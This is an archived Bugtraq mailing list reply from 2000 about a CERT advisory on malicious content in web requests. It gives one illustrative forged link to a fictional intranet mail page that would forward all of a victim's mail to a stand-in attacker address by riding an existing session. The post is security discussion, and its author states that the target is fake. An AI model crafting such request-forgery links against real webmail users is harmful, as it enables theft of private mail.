Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Fwd: CERT Advisory CA-2000-02

From: sekurity () HOTMAIL COM (Cassius)
Date: Thu, 3 Feb 2000 22:11:36 GMT

Shockro,

The danger is also in variables.  Pretend that I get you to click on this
link from within your custom intranet mail app.

badguy () example com">http://intranet.example.com/mailbox.asp?action=forward&item=all&recipient=badguy () example 
com</A>

It would forward all of your mail to badguy () example com.  This would  work
because you already have a session with mailbox.asp.

Of course mailbox.asp is fake but you get the idea.

-Cassius
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
Previous By Date Next
Previous By Thread Next

Current thread: